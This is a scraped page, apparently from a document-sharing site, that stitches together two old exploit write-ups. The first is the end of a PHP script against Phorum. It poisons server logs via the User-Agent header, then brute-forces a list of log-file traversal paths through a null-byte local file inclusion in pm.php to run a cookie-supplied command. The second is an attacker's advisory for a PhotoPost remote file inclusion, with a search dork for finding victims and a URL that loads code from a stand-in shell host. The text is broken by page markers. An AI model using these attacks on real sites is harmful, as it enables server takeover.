$packet.="User-Agent: ".$CODE."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
# fill with possible locations
$paths= array (
" / / / / / / / / / /var/log/httpd/access_log",
" / / / / / / / / / /var/log/httpd/error_log",
" /apache/logs/error.log",
" /apache/logs/access.log",
" / /apache/logs/error.log",
" / /apache/logs/access.log",
" / / /apache/logs/error.log",
" / / /apache/logs/access.log",
" / / / /apache/logs/error.log",
" / / / /apache/logs/access.log",
" / / / / /apache/logs/error.log",
" / / / / /apache/logs/access.log",
Trang 2" /logs/error.log",
" /logs/access.log",
" / /logs/error.log",
" / /logs/access.log",
" / / /logs/error.log",
" / / /logs/access.log",
" / / / /logs/error.log",
" / / / /logs/access.log",
" / / / / /logs/error.log",
" / / / / /logs/access.log",
" / / / / / / / / / /etc/httpd/logs/acces_log",
" / / / / / / / / / /etc/httpd/logs/acces.log",
" / / / / / / / / / /etc/httpd/logs/error_log",
" / / / / / / / / / /etc/httpd/logs/error.log",
" / / / / / / / / / /var/www/logs/access_log",
" / / / / / / / / / /var/www/logs/access.log",
" / / / / / / / / / /usr/local/apache/logs/access_log",
" / / / / / / / / / /usr/local/apache/logs/access.log",
" / / / / / / / / / /var/log/apache/access_log",
" / / / / / / / / / /var/log/apache/access.log",
Trang 3" / / / / / / / / / /var/log/access_log",
" / / / / / / / / / /var/www/logs/error_log",
" / / / / / / / / / /var/www/logs/error.log",
" / / / / / / / / / /usr/local/apache/logs/error_log",
" / / / / / / / / / /usr/local/apache/logs/error.log",
" / / / / / / / / / /var/log/apache/error_log",
" / / / / / / / / / /var/log/apache/error.log",
" / / / / / / / / / /var/log/access_log",
" / / / / / / / / / /var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+3;
echo "[".$a."] trying with $paths[$i]%00 for template argument\r\n";
$packet="GET
".$p."pm.php?1,page=1&GLOBALS[template]=".urlencode($paths[$i])."%00 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie." cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
Trang 4if (strstr($html,"phorum_xpl"))
{
echo "exploit succeeded \n\n";
$temp=explode("phorum_xpl",$html);
echo $temp[1]; die;
}
}
//if you are here
echo "exploit failed ";
?>
original url: http://retrogod.altervista.org/phorum5_local_incl_xpl.html
vns3curity(HCE)
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#=================================================
===================
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#=================================================
===================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
Trang 5#http://www.popphoto.com/
#
#=================================================
================
#
#Script Name: PhotoPost 4.6 & 4.5 & 4.x 4.0
#Fix : update To 4.7 or 4.8
#Script
#http://www.9q9q.net/up3/index.php?f=UyTfHCHIg
#
#=================================================
================
#Bug in : zipndownload.php
# require "$PP_PATH/languages/$pplang/showgallery.php";
# require "$PP_PATH/login-inc.php";
#
#in <<<< zipndownload.php &
#Dork :in Yahoo -: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"
#=================================================
================
#
#Exploit :
# -
#
#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?
#
#=================================I LOVE SAUDI
ARABIA============================================ =
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ :SnIpEr_Sa , King18 , LeCoPrA And All My Frind
#www.S3hr.com , http://www.elite-team.cc/vb , www.3asfh.net ,www.xp10.com